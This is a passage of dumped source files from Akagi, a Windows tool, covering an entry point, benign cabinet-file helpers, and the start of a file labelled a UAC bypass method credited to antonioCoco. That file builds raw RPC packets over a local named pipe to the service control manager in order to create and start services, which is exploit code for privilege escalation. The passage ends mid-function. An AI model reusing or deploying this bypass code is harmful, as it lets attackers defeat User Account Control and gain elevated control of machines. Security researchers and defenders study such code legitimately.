ucmConsolePrintStatus(TEXT(\"[*] ucmInit\"), Status);\n\n    if (!NT_SUCCESS(Status))\n        return Status;\n\n    supMasqueradeProcess(FALSE);\n\n    return MethodsManagerCall(method);\n}\n\n/*\n* main\n*\n* Purpose:\n*\n* Program entry point.\n*\n*/\n#pragma comment(linker, \"/ENTRY:main\")\nVOID __cdecl main()\n{\n#ifdef _UCM_CONSOLE\n    ULONG result;\n\n    result = StubInit(ucmMain);\n    ucmConsolePrintValueUlong(TEXT(\"[+] ucmMain\"), result, TRUE);\n    ucmConsoleRelease();\n    ExitProcess(result);\n\n#else\n    ExitProcess(StubInit(ucmMain));\n#endif\n}\n"
  },
  {
    "path": "Source/Akagi/makecab.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2020\n*\n*  TITLE:       MAKECAB.C\n*\n*  VERSION:     3.24\n*\n*  DATE:        20 Apr 2020\n*\n*  Simplified Cabinet file support for makecab utility replacement.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"makecab.h\"\n\n#pragma comment(lib, \"cabinet.lib\")\n\n/*\n** CAB Callbacks START\n*/\n\nLPVOID DIAMONDAPI fnFCIALLOC(\n    ULONG cb\n)\n{\n    return supHeapAlloc((SIZE_T)cb);\n}\n\nVOID DIAMONDAPI fnFCIFREE(\n    VOID HUGE *lpMem\n)\n{\n    if (lpMem) supHeapFree((PVOID)lpMem);\n}\n\nINT_PTR DIAMONDAPI fnFCIOPEN(\n    LPSTR pszFile,\n    int oflag,\n    int pmode,\n    int FAR *err,\n    void FAR *pv\n)\n{\n    HANDLE hFile = NULL;\n    DWORD dwDesiredAccess = 0;\n    DWORD dwCreationDisposition = 0;\n\n    UNREFERENCED_PARAMETER(pv);\n    UNREFERENCED_PARAMETER(pmode);\n\n    if (oflag & _O_RDWR) {\n        dwDesiredAccess = GENERIC_READ | GENERIC_WRITE;\n    }\n    else if (oflag & _O_WRONLY) {\n        dwDesiredAccess = GENERIC_WRITE;\n    }\n    else {\n        dwDesiredAccess = GENERIC_READ;\n    }\n\n    if (oflag & _O_CREAT) {\n        dwCreationDisposition = CREATE_ALWAYS;\n    }\n    else {\n        dwCreationDisposition = OPEN_EXISTING;\n    }\n\n    hFile = CreateFileA(pszFile,\n        dwDesiredAccess,\n        FILE_SHARE_READ,\n        NULL,\n        dwCreationDisposition,\n        FILE_ATTRIBUTE_NORMAL,\n        NULL);\n\n    if (hFile == INVALID_HANDLE_VALUE) {\n        *err = GetLastError();\n    }\n\n    return (INT_PTR)hFile;\n}\n\nUINT DIAMONDAPI fnFCIREAD(\n    INT_PTR hf,\n    void FAR *memory,\n    
UINT cb,\n    int FAR *err,\n    void FAR *pv\n)\n{\n    DWORD dwBytesRead = 0;\n\n    UNREFERENCED_PARAMETER(pv);\n\n    if (ReadFile((HANDLE)hf, memory, cb, &dwBytesRead, NULL) == FALSE) {\n        dwBytesRead = (DWORD)-1;\n        if (err) {\n            *err = GetLastError();\n        }\n    }\n    return dwBytesRead;\n}\n\nUINT DIAMONDAPI fnFCIWRITE(\n    INT_PTR hf,\n    void FAR *memory,\n    UINT cb,\n    int FAR *err,\n    void FAR *pv\n)\n{\n    DWORD dwBytesWritten = 0;\n\n    UNREFERENCED_PARAMETER(pv);\n\n    if (WriteFile((HANDLE)hf, memory, cb, &dwBytesWritten, NULL) == FALSE) {\n        dwBytesWritten = (DWORD)-1;\n        if (err) {\n            *err = GetLastError();\n        }\n    }\n    return dwBytesWritten;\n}\n\nint DIAMONDAPI fnFCICLOSE(\n    INT_PTR hf,\n    int FAR *err,\n    void FAR *pv\n)\n{\n    INT iResult = 0;\n\n    UNREFERENCED_PARAMETER(pv);\n\n    if (CloseHandle((HANDLE)hf) == FALSE) {\n        if (err) {\n            *err = GetLastError();\n        }\n        iResult = -1;\n    }\n    return iResult;\n}\n\nlong DIAMONDAPI fnFCISEEK(\n    INT_PTR hf,\n    long dist,\n    int seektype,\n    int FAR *err,\n    void FAR *pv\n)\n{\n    INT iResult = 0;\n   // LARGE_INTEGER mdist, ndist;\n\n    UNREFERENCED_PARAMETER(pv);\n\n   /* \n    sdist.LowPart = dist;\n    mdist.HighPart = 0;\n    ndist.LowPart = 0;\n    ndist.HighPart = 0;\n    if (!SetFilePointerEx((HANDLE)hf, mdist, &ndist, seektype)) {\n        if (err) *err = GetLastError();\n    }\n    return ndist.LowPart;\n    */\n\n    iResult = SetFilePointer((HANDLE)hf, dist, NULL, seektype); //-V303\n    if (iResult == -1) {\n        if (err) {\n            *err = GetLastError();\n        }\n    }\n    return iResult;\n}\n\nint DIAMONDAPI fnFCIDELETE(\n    LPSTR pszFile,\n    int FAR *err,\n    void FAR *pv\n)\n{\n    INT iResult = 0;\n\n    UNREFERENCED_PARAMETER(pv);\n\n    if (DeleteFileA(pszFile) == FALSE) {\n        if (err) {\n            *err = GetLastError();\n        }\n  
      iResult = -1;\n    }\n    return iResult;\n}\n\nlong DIAMONDAPI fnFCISTATUS(\n    UINT typeStatus,\n    ULONG cb1,\n    ULONG cb2,\n    void FAR *pv\n)\n{\n    UNREFERENCED_PARAMETER(typeStatus);\n    UNREFERENCED_PARAMETER(cb1);\n    UNREFERENCED_PARAMETER(cb2);\n    UNREFERENCED_PARAMETER(pv);\n\n    return 0; //not implemented\n}\n\nint DIAMONDAPI fnFCIFILEPLACED(\n    PCCAB pccab,\n    LPSTR pszFile,\n    long cbFile,\n    BOOL fContinuation,\n    void FAR *pv\n)\n{\n    UNREFERENCED_PARAMETER(pccab);\n    UNREFERENCED_PARAMETER(pszFile);\n    UNREFERENCED_PARAMETER(cbFile);\n    UNREFERENCED_PARAMETER(fContinuation);\n    UNREFERENCED_PARAMETER(pv);\n\n    return 0; //not implemented\n}\n\nINT_PTR DIAMONDAPI fnFCIGETOPENINFO(\n    LPSTR pszName,\n    USHORT *pdate,\n    USHORT *ptime,\n    USHORT *pattribs,\n    int FAR *err,\n    void FAR *pv\n)\n{\n    HANDLE hFile;\n    FILETIME fileTime;\n    BY_HANDLE_FILE_INFORMATION fileInfo;\n\n    hFile = (HANDLE)fnFCIOPEN(pszName, _O_RDONLY, 0, err, pv);\n\n    if (hFile != INVALID_HANDLE_VALUE)\n    {\n        if (GetFileInformationByHandle(hFile, &fileInfo)\n            && FileTimeToLocalFileTime(&fileInfo.ftCreationTime, &fileTime)\n            && FileTimeToDosDateTime(&fileTime, pdate, ptime))\n        {\n            *pattribs = (USHORT)fileInfo.dwFileAttributes;\n            *pattribs &= (\n                FILE_ATTRIBUTE_READONLY |\n                FILE_ATTRIBUTE_HIDDEN |\n                FILE_ATTRIBUTE_SYSTEM |\n                FILE_ATTRIBUTE_ARCHIVE\n                );\n        }\n        else\n        {\n            fnFCICLOSE((INT_PTR)hFile, err, pv);\n            hFile = INVALID_HANDLE_VALUE;\n        }\n    }\n\n    return (INT_PTR)hFile;\n}\n\nBOOL DIAMONDAPI fnFCIGETTEMPFILE(\n    char *pszTempName,\n    int cbTempName,\n    void FAR *pv\n)\n{\n    BOOL bSucceeded = FALSE;\n    SIZE_T cch;\n    CHAR szTempPath[MAX_PATH];\n    CHAR szTempFile[MAX_PATH];\n\n    UNREFERENCED_PARAMETER(pv);\n\n    
RtlSecureZeroMemory(szTempPath, sizeof(szTempPath));\n    RtlSecureZeroMemory(szTempFile, sizeof(szTempFile));\n\n    if (GetTempPathA(MAX_PATH, szTempPath) != 0) {\n        if (GetTempFileNameA(szTempPath, \"ucm\", 0, szTempFile) != 0) {\n            DeleteFileA(szTempFile);\n            cch = (SIZE_T)(cbTempName / sizeof(CHAR));\n            _strncpy_a(pszTempName, cch, szTempFile, _strlen_a(szTempFile));\n            bSucceeded = TRUE;\n        }\n    }\n\n    return bSucceeded;\n}\n\nBOOL DIAMONDAPI fnFCIGETNEXTCABINET(\n    PCCAB  pccab,\n    ULONG  cbPrevCab,\n    void FAR *pv\n)\n{\n    UNREFERENCED_PARAMETER(pccab);\n    UNREFERENCED_PARAMETER(cbPrevCab);\n    UNREFERENCED_PARAMETER(pv);\n\n    return FALSE;\n}\n\n/*\n** CAB Callbacks END\n*/\n\n/*\n* cabCreate\n*\n* Purpose:\n*\n* Initialize cabinet class object.\n*\n*/\nCABDATA *cabCreate(\n    _In_ LPWSTR lpszCabName\n)\n{\n    PCABDATA pCabinet;\n    CHAR szCab[CB_MAX_CABINET_NAME];\n\n    if (lpszCabName == NULL) {\n        return NULL;\n    }\n\n    RtlSecureZeroMemory(szCab, sizeof(szCab));\n    if (WideCharToMultiByte(CP_ACP, 0, lpszCabName, -1, szCab, CB_MAX_CABINET_NAME - 2, 0, NULL) == 0) {\n        return NULL;\n    }\n\n    pCabinet = (PCABDATA)supHeapAlloc(sizeof(CABDATA));\n    if (pCabinet == NULL)\n        return NULL;\n\n    _strcpy_a(pCabinet->cab.szCab, szCab); //Full name with path or only name (current folder then).\n\n    pCabinet->cab.cb = 0x7FFFFFFF; //Maximum cabinet size in bytes.\n\n    pCabinet->hfci = FCICreate(\n        &pCabinet->erf,\n        fnFCIFILEPLACED,\n        fnFCIALLOC,\n        fnFCIFREE,\n        fnFCIOPEN,\n        fnFCIREAD,\n        fnFCIWRITE,\n        fnFCICLOSE,\n        fnFCISEEK,\n        fnFCIDELETE,\n        fnFCIGETTEMPFILE,\n        &pCabinet->cab,\n        NULL);\n\n    if (pCabinet->hfci == NULL) {\n        supHeapFree(pCabinet);\n        pCabinet = NULL;\n    }\n    return pCabinet;\n}\n\n/*\n* cabAddFile\n*\n* Purpose:\n*\n* Insert given file to 
the previously initialized cabinet object.\n*\n*/\nBOOL cabAddFile(\n    _In_ CABDATA *Cabinet,\n    _In_ LPWSTR lpszFileName,\n    _In_ LPWSTR lpszInternalName\n)\n{\n    BOOL bResult = FALSE;\n    CHAR szFileName[CB_MAX_FILENAME];\n    CHAR szInternalName[CB_MAX_FILENAME];\n\n    do {\n\n        if (Cabinet == NULL) {\n            break;\n        }\n\n        //convert filename to ansi\n        RtlSecureZeroMemory(szFileName, sizeof(szFileName));\n        if (WideCharToMultiByte(CP_ACP, 0, lpszFileName, -1, szFileName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {\n            break;\n        }\n        //convert internal name to ansi\n        RtlSecureZeroMemory(szInternalName, sizeof(szInternalName));\n        if (WideCharToMultiByte(CP_ACP, 0, lpszInternalName, -1, szInternalName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {\n            break;\n        }\n\n        bResult = FCIAddFile(Cabinet->hfci, (char*)szFileName, (char*)szInternalName, FALSE,\n            fnFCIGETNEXTCABINET, fnFCISTATUS, fnFCIGETOPENINFO, tcompTYPE_NONE /*tcompTYPE_MSZIP*/);\n\n    } while (FALSE);\n\n    return bResult;\n}\n\n/*\n* cabClose\n*\n* Purpose:\n*\n* Flush file and destroy cabinet class.\n*\n*/\nVOID cabClose(\n    _In_ CABDATA *Cabinet\n)\n{\n    if (Cabinet == NULL) {\n        return;\n    }\n\n    FCIFlushCabinet(\n        Cabinet->hfci,\n        FALSE,\n        fnFCIGETNEXTCABINET,\n        fnFCISTATUS\n    );\n\n    FCIDestroy(Cabinet->hfci);\n    supHeapFree(Cabinet);\n}\n"
  },
  {
    "path": "Source/Akagi/makecab.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2017\n*\n*  TITLE:       MAKECAB.H\n*\n*  VERSION:     2.70\n*\n*  DATE:        25 Mar 2017\n*\n*  Prototypes and definitions for makecab module.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#include <fci.h>\n#include <fcntl.h>\n\ntypedef struct _CABDATA {\n    ERF erf;\n    CCAB cab;\n    HFCI hfci;\n} CABDATA, *PCABDATA;\n\nCABDATA *cabCreate(\n    _In_ LPWSTR lpszCabName);\n\nBOOL cabAddFile(\n    _In_ CABDATA *Cabinet,\n    _In_ LPWSTR lpszFileName,\n    _In_ LPWSTR lpszInternalName);\n\nVOID cabClose(\n    _In_ CABDATA *Cabinet);\n"
  },
  {
    "path": "Source/Akagi/methods/antonioCoco.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2023 - 2025\n*\n*  TITLE:       ANTONIOCOCO.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  UAC bypass method from antonioCoco.\n*\n*  https://github.com/antonioCoco/SspiUacBypass\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n#define MAX_MESSAGE_SIZE 12000\n\n// rpc command ids\n#define RPC_CMD_ID_OPEN_SC_MANAGERW 15\n#define RPC_CMD_ID_CREATE_SERVICEW 12\n#define RPC_CMD_ID_START_SERVICEW 19\n#define RPC_CMD_ID_DELETE_SERVICE 2\n\n// rpc command output lengths\n#define RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER 24\n#define RPC_OUTPUT_LENGTH_CREATE_SERVICE 28\n#define RPC_OUTPUT_LENGTH_START_SERVICE 4\n#define RPC_OUTPUT_LENGTH_DELETE_SERVICE 4\n\n#define MAX_RPC_PACKET_LENGTH 4096\n#define MAX_PROCEDURE_DATA_LENGTH 2048\n\n#define CALC_ALIGN_PADDING(VALUE_LENGTH, ALIGN_BYTES) (((((VALUE_LENGTH) + (ALIGN_BYTES) - 1) / (ALIGN_BYTES)) * (ALIGN_BYTES)) - (VALUE_LENGTH))\n\n// {8a885d04-1ceb-11c9-9fe8-08002b104860} (NDR)\n#define RPC_NDR_UUID (RPC_WSTR)L\"8a885d04-1ceb-11c9-9fe8-08002b104860\"\n#define SVCCTL_UUID (RPC_WSTR)L\"367abb81-9844-35f1-ad32-98f038001003\"\n\ntypedef struct _RPC_BASE_HEADER {\n    WORD wVersion;\n    BYTE bPacketType;\n    BYTE bPacketFlags;\n    DWORD dwDataRepresentation;\n    WORD wFragLength;\n    WORD wAuthLength;\n    DWORD dwCallIndex;\n} RPC_BASE_HEADER, * PRPC_BASE_HEADER;\n\ntypedef struct _RPC_REQUEST_HEADER {\n    DWORD dwAllocHint;\n    WORD wContextID;\n    WORD wProcedureNumber;\n} RPC_REQUEST_HEADER, * PRPC_REQUEST_HEADER;\n\ntypedef struct _RPC_RESPONSE_HEADER {\n    DWORD dwAllocHint;\n    WORD 
wContextID;\n    BYTE bCancelCount;\n    BYTE bAlign[1];\n} RPC_RESPONSE_HEADER, * PRPC_RESPONSE_HEADER;\n\ntypedef struct _RPC_BIND_REQUEST_CONTEXT_ENTRY {\n    WORD wContextID;\n    WORD wTransItemCount;\n    UUID InterfaceUUID;\n    DWORD dwInterfaceVersion;\n    UUID TransferSyntaxUUID;\n    DWORD dwTransferSyntaxVersion;\n} RPC_BIND_REQUEST_CONTEXT_ENTRY, * PRPC_BIND_REQUEST_CONTEXT_ENTRY;\n\ntypedef struct _RPC_BIND_REQUEST_HEADER {\n    WORD wMaxSendFrag;\n    WORD wMaxRecvFrag;\n    DWORD dwAssocGroup;\n    BYTE bContextCount;\n    BYTE bAlign[3];\n    RPC_BIND_REQUEST_CONTEXT_ENTRY Context;\n} RPC_BIND_REQUEST_HEADER, * PRPC_BIND_REQUEST_HEADER;\n\ntypedef struct _RPC_BIND_RESPONSE_CONTEXT_ENTRY {\n    WORD wResult;\n    WORD wAlign;\n    BYTE bTransferSyntax[16];\n    DWORD dwTransferSyntaxVersion;\n} RPC_BIND_RESPONSE_CONTEXT_ENTRY, * PRPC_BIND_RESPONSE_CONTEXT_ENTRY;\n\ntypedef struct _RPC_BIND_RESPONSE_HEADER1 {\n    WORD wMaxSendFrag;\n    WORD wMaxRecvFrag;\n    DWORD dwAssocGroup;\n} RPC_BIND_RESPONSE_HEADER1, * PRPC_BIND_RESPONSE_HEADER1;\n\ntypedef struct _RPC_BIND_RESPONSE_HEADER2 {\n    DWORD dwContextResultCount;\n    RPC_BIND_RESPONSE_CONTEXT_ENTRY Context;\n} RPC_BIND_RESPONSE_HEADER2, * PRPC_BIND_RESPONSE_HEADER2;\n\ntypedef struct _RPC_CONNECTION {\n    HANDLE hFile;\n    DWORD dwCallIndex;\n    DWORD dwInputError;\n    DWORD dwRequestInitialized;\n    BYTE bProcedureInputData[MAX_PROCEDURE_DATA_LENGTH];\n    DWORD dwProcedureInputDataLength;\n    BYTE bProcedureOutputData[MAX_PROCEDURE_DATA_LENGTH];\n    DWORD dwProcedureOutputDataLength;\n} RPC_CONNECTION, * PRPC_CONNECTION;\n\nBOOL ucmxRpcBind(\n    _In_ PRPC_CONNECTION pRpcConnection,\n    _In_ RPC_WSTR pInterfaceUUID,\n    _In_ DWORD dwInterfaceVersion)\n{\n    RPC_BASE_HEADER RpcBaseHeader;\n    RPC_BIND_REQUEST_HEADER RpcBindRequestHeader;\n    DWORD dwBytesWritten = 0;\n    DWORD dwBytesRead = 0;\n    BYTE bResponseData[MAX_RPC_PACKET_LENGTH];\n    RPC_BASE_HEADER* 
pRpcResponseBaseHeader = NULL;\n    RPC_BIND_RESPONSE_HEADER1* pRpcBindResponseHeader1 = NULL;\n    RPC_BIND_RESPONSE_HEADER2* pRpcBindResponseHeader2 = NULL;\n    BYTE* pSecondaryAddrHeaderBlock = NULL;\n    WORD wSecondaryAddrLen = 0;\n    DWORD dwSecondaryAddrAlign = 0;\n\n    //\n    // Set base header details.\n    //\n    RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader));\n    RpcBaseHeader.wVersion = 5;\n    RpcBaseHeader.bPacketType = 11;\n    RpcBaseHeader.bPacketFlags = 3;\n    RpcBaseHeader.dwDataRepresentation = 0x10;\n    RpcBaseHeader.wFragLength = sizeof(RpcBaseHeader) + sizeof(RpcBindRequestHeader);\n    RpcBaseHeader.wAuthLength = 0;\n    RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;\n\n    //\n    // Set bind request header details.\n    //\n    RtlSecureZeroMemory(&RpcBindRequestHeader, sizeof(RpcBindRequestHeader));\n    RpcBindRequestHeader.wMaxSendFrag = MAX_RPC_PACKET_LENGTH;\n    RpcBindRequestHeader.wMaxRecvFrag = MAX_RPC_PACKET_LENGTH;\n    RpcBindRequestHeader.dwAssocGroup = 0;\n    RpcBindRequestHeader.bContextCount = 1;\n    RpcBindRequestHeader.Context.wContextID = 0;\n    RpcBindRequestHeader.Context.wTransItemCount = 1;\n    RpcBindRequestHeader.Context.dwTransferSyntaxVersion = 2;\n\n    if (RPC_S_OK != UuidFromString(pInterfaceUUID, &RpcBindRequestHeader.Context.InterfaceUUID))\n        return FALSE;\n\n    RpcBindRequestHeader.Context.dwInterfaceVersion = dwInterfaceVersion;\n    if (RPC_S_OK != UuidFromString(RPC_NDR_UUID, &RpcBindRequestHeader.Context.TransferSyntaxUUID))\n        return FALSE;\n\n    //\n    // Write base header.\n    //\n    if (!WriteFile(pRpcConnection->hFile,\n        &RpcBaseHeader,\n        sizeof(RpcBaseHeader),\n        &dwBytesWritten,\n        NULL))\n    {\n        return FALSE;\n    }\n\n    //\n    // Write bind request header.\n    //\n    if (!WriteFile(pRpcConnection->hFile,\n        &RpcBindRequestHeader,\n        sizeof(RpcBindRequestHeader),\n        &dwBytesWritten,\n     
   NULL))\n    {\n        return FALSE;\n    }\n\n    pRpcConnection->dwCallIndex++;\n\n    //\n    // Get bind response.\n    //\n    RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData));\n    if (!ReadFile(pRpcConnection->hFile,\n        bResponseData,\n        sizeof(bResponseData),\n        &dwBytesRead,\n        NULL))\n    {\n        return FALSE;\n    }\n\n    //\n    // Get a ptr to the base response header.\n    //\n    pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData;\n\n    //\n    // Validate base response header.\n    //\n    if ((pRpcResponseBaseHeader->wVersion != 5) ||\n        (pRpcResponseBaseHeader->bPacketType != 12) ||\n        (pRpcResponseBaseHeader->bPacketFlags != 3) ||\n        (pRpcResponseBaseHeader->wFragLength != dwBytesRead))\n    {\n        return FALSE;\n    }\n\n    //\n    // Get a ptr to the main bind response header body.\n    //   \n    pRpcBindResponseHeader1 = (PRPC_BIND_RESPONSE_HEADER1)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER));\n\n    //\n    // Get secondary addr header ptr.\n    //\n    pSecondaryAddrHeaderBlock = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcBindResponseHeader1, sizeof(RPC_BIND_RESPONSE_HEADER1));\n    wSecondaryAddrLen = *(WORD*)pSecondaryAddrHeaderBlock;\n\n    //\n    // Validate secondary addr length.\n    //\n    if (wSecondaryAddrLen > 256)\n        return FALSE;\n\n    //\n    // Calculate padding for secondary addr value if necessary.\n    //\n    dwSecondaryAddrAlign = CALC_ALIGN_PADDING((sizeof(WORD) + wSecondaryAddrLen), sizeof(ULONG));\n\n    //\n    // Get a ptr to the main bind response header body (after the variable-length secondary addr field).\n    //\n    pRpcBindResponseHeader2 = (PRPC_BIND_RESPONSE_HEADER2)RtlOffsetToPointer((BYTE*)pSecondaryAddrHeaderBlock,\n        sizeof(WORD) + wSecondaryAddrLen + dwSecondaryAddrAlign);\n\n    //\n    // Validate context count.\n    // Ensure the result value for context #1 was successful.\n    //\n    if 
((pRpcBindResponseHeader2->dwContextResultCount != 1) ||\n        (pRpcBindResponseHeader2->Context.wResult != 0))\n    {\n        return FALSE;\n    }\n\n    return TRUE;\n}\n\nBOOL ucmxRpcConnect(\n    _In_ LPCWSTR lpPipeName,\n    _In_ RPC_WSTR pInterfaceUUID,\n    _In_ DWORD dwInterfaceVersion,\n    _In_ PRPC_CONNECTION pRpcConnection)\n{\n    HANDLE hFile = NULL;\n    WCHAR szPipePath[MAX_PATH * 2];\n    RPC_CONNECTION RpcConnection;\n\n    //\n    // Set pipe path.\n    //\n    RtlSecureZeroMemory(szPipePath, sizeof(szPipePath));\n    _strcpy(szPipePath, TEXT(\"\\\\\\\\127.0.0.1\\\\pipe\\\\\"));\n    _strcat(szPipePath, lpPipeName);\n\n    //\n    // Open rpc pipe.\n    //\n    hFile = CreateFile(szPipePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);\n    if (hFile == INVALID_HANDLE_VALUE)\n        return FALSE;\n\n    //\n    // Initialize rpc connection data.\n    //\n    RtlSecureZeroMemory(&RpcConnection, sizeof(RpcConnection));\n    RpcConnection.hFile = hFile;\n    RpcConnection.dwCallIndex = 1;\n\n    //\n    // Bind rpc connection.\n    //\n    if (!ucmxRpcBind(&RpcConnection, pInterfaceUUID, dwInterfaceVersion))\n        return FALSE;\n\n    //\n    // Store connection data.\n    //\n    RtlCopyMemory(pRpcConnection, &RpcConnection, sizeof(RpcConnection));\n\n    return TRUE;\n}\n\nVOID ucmxRpcInitializeRequestData(\n    _In_ PRPC_CONNECTION pRpcConnection)\n{\n    //\n    // Initialize request data.\n    //\n    RtlSecureZeroMemory(pRpcConnection->bProcedureInputData, sizeof(pRpcConnection->bProcedureInputData));\n    pRpcConnection->dwProcedureInputDataLength = 0;\n    RtlSecureZeroMemory(pRpcConnection->bProcedureOutputData, sizeof(pRpcConnection->bProcedureOutputData));\n    pRpcConnection->dwProcedureOutputDataLength = 0;\n\n    //\n    // Reset input error flag.\n    //\n    pRpcConnection->dwInputError = 0;\n\n    pRpcConnection->dwRequestInitialized = 1;\n}\n\nBOOL ucmxRpcSendRequest(\n    _In_ PRPC_CONNECTION 
pRpcConnection,\n    _In_ DWORD dwProcedureNumber)\n{\n    RPC_BASE_HEADER RpcBaseHeader;\n    RPC_REQUEST_HEADER RpcRequestHeader;\n    DWORD dwBytesWritten = 0;\n    BYTE bResponseData[MAX_RPC_PACKET_LENGTH];\n    RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL;\n    RPC_RESPONSE_HEADER* pRpcResponseHeader = NULL;\n    DWORD dwProcedureResponseDataLength = 0;\n    DWORD dwBytesRead = 0;\n    BYTE* pTempProcedureResponseDataPtr = NULL;\n\n    //\n    // Ensure rpc request has been initialized.\n    //\n    if (pRpcConnection->dwRequestInitialized == 0)\n        return FALSE;\n\n    //\n    // Clear initialised flag.\n    //\n    pRpcConnection->dwRequestInitialized = 0;\n\n    //\n    // Check for input errors.\n    //\n    if (pRpcConnection->dwInputError != 0)\n        return FALSE;\n\n    //\n    // Set base header details.\n    //\n    RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader));\n    RpcBaseHeader.wVersion = 5;\n    RpcBaseHeader.bPacketType = 0;\n    RpcBaseHeader.bPacketFlags = 3;\n    RpcBaseHeader.dwDataRepresentation = 0x10;\n    RpcBaseHeader.wFragLength = (WORD)(sizeof(RPC_BASE_HEADER) + sizeof(RPC_REQUEST_HEADER) + pRpcConnection->dwProcedureInputDataLength);\n    RpcBaseHeader.wAuthLength = 0;\n    RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;\n\n    //\n    // Set request header details.\n    //\n    RtlSecureZeroMemory(&RpcRequestHeader, sizeof(RpcRequestHeader));\n    RpcRequestHeader.dwAllocHint = 0;\n    RpcRequestHeader.wContextID = 0;\n    RpcRequestHeader.wProcedureNumber = (WORD)dwProcedureNumber;\n\n    //\n    // Write base header.\n    //\n    if (!WriteFile(pRpcConnection->hFile,\n        &RpcBaseHeader,\n        sizeof(RpcBaseHeader),\n        &dwBytesWritten, NULL))\n    {\n        return FALSE;\n    }\n\n    //\n    // Write request header.\n    //\n    if (!WriteFile(pRpcConnection->hFile,\n        &RpcRequestHeader,\n        sizeof(RpcRequestHeader),\n        &dwBytesWritten,\n        NULL))\n    {\n        
return FALSE;\n    }\n\n    //\n    // Write request body.\n    //\n    if (!WriteFile(pRpcConnection->hFile,\n        pRpcConnection->bProcedureInputData,\n        pRpcConnection->dwProcedureInputDataLength,\n        &dwBytesWritten,\n        NULL))\n    {\n        return FALSE;\n    }\n\n    //\n    // Increase call index.\n    //\n    pRpcConnection->dwCallIndex++;\n\n    //\n    // Get procedure response.\n    //\n    RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData));\n    if (!ReadFile(pRpcConnection->hFile,\n        bResponseData,\n        sizeof(bResponseData),\n        &dwBytesRead,\n        NULL))\n    {\n        return FALSE;\n    }\n\n    //\n    // Get a ptr to the base response header.\n    //\n    pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData;\n\n    //\n    // Validate base response header.\n    //\n    if ((pRpcResponseBaseHeader->wVersion != 5) ||\n        (pRpcResponseBaseHeader->bPacketType != 2) ||\n        (pRpcResponseBaseHeader->bPacketFlags != 3) ||\n        (pRpcResponseBaseHeader->wFragLength != dwBytesRead))\n    {\n        return FALSE;\n    }\n\n    //\n    // Get a ptr to the main response header body.\n    //\n    pRpcResponseHeader = (RPC_RESPONSE_HEADER*)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER));\n\n    //\n    // Context ID must be 0.\n    //\n    if (pRpcResponseHeader->wContextID != 0)\n        return FALSE;\n\n    //\n    // Calculate command response data length.\n    //\n    dwProcedureResponseDataLength = pRpcResponseBaseHeader->wFragLength - sizeof(RPC_BASE_HEADER) - sizeof(RPC_RESPONSE_HEADER);\n\n    //\n    // Store response data.\n    //\n    if (dwProcedureResponseDataLength > sizeof(pRpcConnection->bProcedureOutputData))\n        return FALSE;\n\n    pTempProcedureResponseDataPtr = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcResponseHeader, sizeof(RPC_RESPONSE_HEADER));\n    RtlCopyMemory(pRpcConnection->bProcedureOutputData, pTempProcedureResponseDataPtr, 
dwProcedureResponseDataLength);\n\n    //\n    // Store response data length.\n    //\n    pRpcConnection->dwProcedureOutputDataLength = dwProcedureResponseDataLength;\n\n    return TRUE;\n}\n\nBOOL ucmxRpcAppendRequestData_Binary(\n    _In_ PRPC_CONNECTION RpcConnection,\n    _In_ BYTE* Data,\n    _In_ DWORD DataLength,\n    _In_ BOOL IsUnicode)\n{\n    DWORD dwBytesAvailable = 0;\n    DWORD dwDataLength = DataLength;\n    DWORD dwPadding = 0;\n\n    if (IsUnicode)\n        dwDataLength *= sizeof(WCHAR);\n\n    //\n    // Ensure the request has been initialized.\n    //\n    if (RpcConnection->dwRequestInitialized == 0)\n        return FALSE;\n\n    dwPadding = CALC_ALIGN_PADDING(dwDataLength, sizeof(ULONG));\n\n    //\n    // Calculate number of bytes remaining in the input buffer.\n    //\n    dwBytesAvailable = sizeof(RpcConnection->bProcedureInputData) - RpcConnection->dwProcedureInputDataLength;\n    if ((dwDataLength + dwPadding) > dwBytesAvailable)\n    {\n        //\n        // Set input error flag.\n        //\n        RpcConnection->dwInputError = 1;\n        return FALSE;\n    }\n\n    //\n    // Store data in buffer.\n    //\n    RtlCopyMemory(&RpcConnection->bProcedureInputData[RpcConnection->dwProcedureInputDataLength], Data, dwDataLength);\n    